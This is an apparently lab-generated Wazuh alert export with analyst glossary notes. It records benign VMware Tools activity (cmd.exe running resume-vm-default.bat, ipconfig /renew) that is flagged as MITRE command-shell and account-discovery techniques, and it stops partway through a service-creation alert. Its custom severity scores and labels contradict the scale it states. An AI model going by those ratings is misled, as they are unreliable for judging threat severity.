data.win.eventdata.creationUtcTime:  2025-04-17 16:48:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

No description

🧠 What happened? No description

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:33:11.751+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:11.751+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.id:  11
Numeric ID of the detection rule that fired.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['stats']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533991.561646
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  The average number of logs between 22:00 and 23:00 is 2213. We reached 5534.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:26.7422645Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  216633
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-17 16:52:26.740 ProcessGuid: {94294ddc-ea80-67fe-0d00-000000000e00} ProcessId: 908 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8348\Reason Details: DWORD (0x00000004) User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:52:26.740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea80-67fe-0d00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\TermReason\\8348\\Reason
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  DWORD (0x00000004)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  4
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:35.079+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:35.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534015.563163
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.4122124Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218350
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:34.927 ProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ProcessId: 13156 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:34.927
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:35.160+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:35.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534015.568786
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.6081940Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218360
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:35.504 ProcessGuid: {94294ddc-5093-6804-8508-000000000e00} ProcessId: 2096 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ParentProcessId: 13156 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:35.504
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5093-6804-8508-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:41.348+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:41.348+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534021.574270
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:40.1776576Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  218817
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-20 01:40:40.137 ProcessGuid: {94294ddc-5098-6804-9208-000000000e00} ProcessId: 9944 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} ParentProcessId: 13156 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:40.137
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-5098-6804-9208-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  IP Configuration Utility
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-5092-6804-8308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13156
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:42.545+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:42.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534022.579734
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
